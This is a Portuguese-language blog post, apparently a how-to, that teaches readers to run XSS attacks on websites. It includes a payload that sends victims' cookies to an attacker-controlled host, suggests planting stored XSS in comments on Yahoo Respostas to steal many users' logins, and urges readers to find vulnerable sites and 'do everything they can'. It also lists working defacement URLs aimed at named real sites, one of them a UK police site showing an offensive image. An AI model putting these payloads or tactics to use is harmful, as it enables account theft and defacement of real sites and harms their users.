http://pt.wikipedia.org/wiki/Cross-site_scripting
Introdução:
Bem olá a todos.
Como prometido, irei fazer um tutorial de como fazer a injeção de códigos javascript (maliciosos ou não) em um site.
Está técnica se chama XSS (cross site scripting) e é encontrado MILHARES de sites com está vulnerabilidade todos os dias.
Está técnica é muito usada em query strings (popularmente dito método $_GET em php), mas também existem em métodos como $_POST, mas a metodologia é sempre a mesma.
Uso:
Basicamente o uso do XSS é injetar scripts javascript em páginas, de modo que elas sejam executadas no navegador do cliente.
Para achar um site vulnerável basicamente pegue uma página qualquer:
"pagina.php?erro=Ola Amigo"
Percebei nosso erro=Ola Amigo?
Caso no código PHP ter:
echo $_GET['erro'];
Ocorrerá de imprimir o que está no erro= (que no exemplo seria Ola Amigo)
Porém se eu colocar código javascript? Ai que está o ponto X da questão.
Ele executará o código javascript, caso eu colocar:
pagina.php?erro=<script>alert('site vulneravel a xss');</script>
O Código em negrito será exibido e mostrará um alerta.
Segurança
A principio não trás coisas ruim, mas já pensou o que se pode fazer executando javascript no computador de outro cliente na página que vocês quiserem?
Você pode pegar o document.cookie do cliente, por exemplo.
DOCUMENT.COOKIE armazena o cookie do documento atual, caso você pegar ele, você simplesmente estará com a senha e login do cara em suas mãos (é assim que funciona aquele negócio de cookies premium)
Então basta fazer uma função em ajax, para enviar o cookie do cara para seu site, exemplo:
pagina.php?erro=<script>enviarRequestAjax('www.suapaginaprapegacookie.com?cookie=' + document.cookie);</script>
Interessante, não acham? ..
Asssim como podemos colocar isto em comentários
Exemplo:
Estou no site do yahoo respostas
e coloco uma pergunta com o seguinte: <script>alert('xss');</script>
Então este código será minha pergunta, caso alguém acessar minha pergunta, verá este código, o que acontecerá de dar alertas, já pensou que loucura seria? Roubar a senha de vários usuários usando apenas document.cookie e uma vulnerabilidade xss.
Claro que Yahoo Resposta é um exemplo, mas lembre-se que MUITOS sites tem vulnerabilidade, eu digo porque já vi sites da globo, orkut, viva o linux, facebook e muitos outros com esta vulnerabilidade, é só uma questão de achar um e sair fazendo tudo que poder
Exemplo:
http://www.gmp.police.uk/live/nhoodv3.nsf/index-divisions.html?ReadForm&Division=</title><img%20src=http://lh4.ggpht.com/_Cl6M776htkA/TAj1lujVLgI/AAAAAAAACG0/JFbdemiuBqs/341%20-%20Imagensidiotas_-_Fuck_foda-se_police_policia.jpg%20/><font%20size%20=%201000>IPS%20TEAM%20CU</strong></br></br></br></br></br></br></br></br></br></br></br></br></br></br></br></br>
http://www.ospaparazzi.com.br/busca/?q=%3Ch1%3EXSS%3C/h1%3E%20%3Cbr%20/%3E%20%3Cbr%20/%3E%20%3Ch1%3EXSS%3C/h1%3E%20%3Cbr%20/%3E%20%3Cbr%20/%3E%20%3Ch1%3EXSS%3C/h1%3E%20%3Cbr%20/%3E%20%3Cbr%20/%3E%20%3Ch1%3EXSS%3C/h1%3E%20%3Cbr%20/%3E%20%3Cbr%20/%3E
http://www.promix.com.br/home/busca.php?termo=%3Ch3%3ERSRSRSRS%3Cbr/%3E%3Cimg%20src=%22https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3zH0izqKEUn3UynM4z3wON4E7KPqgC6E5ad1EoOkjA_y7l0dp98FnDyWVI5d-WkT2bPcpn7qTyQ4wJ4r6qMBo_fHiwcpgi3IZ0-EduxhdCIpaH7lkk8FZ50vRP0SHlJ-R27BMHb2MeN0/s400/mulher+feia+b.JPG%22%20/%3E%3C/h3%3E
É isto ..
Abraços
Um comentário:
ola
Postar um comentário